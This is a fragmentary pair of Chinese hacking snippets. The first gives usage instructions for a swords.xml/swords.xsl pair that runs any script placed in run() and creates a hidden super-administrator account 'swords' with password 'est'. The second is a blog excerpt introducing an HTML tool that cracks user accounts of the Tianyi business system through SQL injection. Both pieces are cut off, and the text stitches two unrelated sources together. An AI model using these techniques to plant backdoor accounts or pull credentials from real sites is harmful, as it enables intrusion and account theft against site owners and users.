用法：把swords.xml和swords.xsl放在一个普通空间，相信很少人会注意xml的安全性吧，嘎嘎，只要把你想运行的程序添加到run()即可，默认支持js和vbs.这个程序加了一个用户为swords，密码为est的超级管理员账号。swords.xml<?xmlversion="1.0"encoding="GB2312"?><?xml-stylesheettype="text/xsl"href="swords.xsl"?><name>Iamswords,Iamadmin!</name>swords.xsl<?xmlversion="1...

 /**慈勤强http://blog.csdn.net/cqq*/自从上次写了个天意商务系统破解程序之后，收到了不少朋友的来信，有询问程序原理的，有询问如何防护的。今天，我抽了一点时间，做了这个Html版，就只有这一个htm文件相信有点html知识和SQL Injection知识的朋友都能够看懂原理非常简单，破解用户帐号是用的SQL Injection方法，因为这套系统好多地方存在sql injection漏洞，然后自己下载个这套系统，就可以很方便的找出问题了。以前是Vc++版本，现在是html版本，不过都是一样，就是通过http协议取得网页的源文件然后...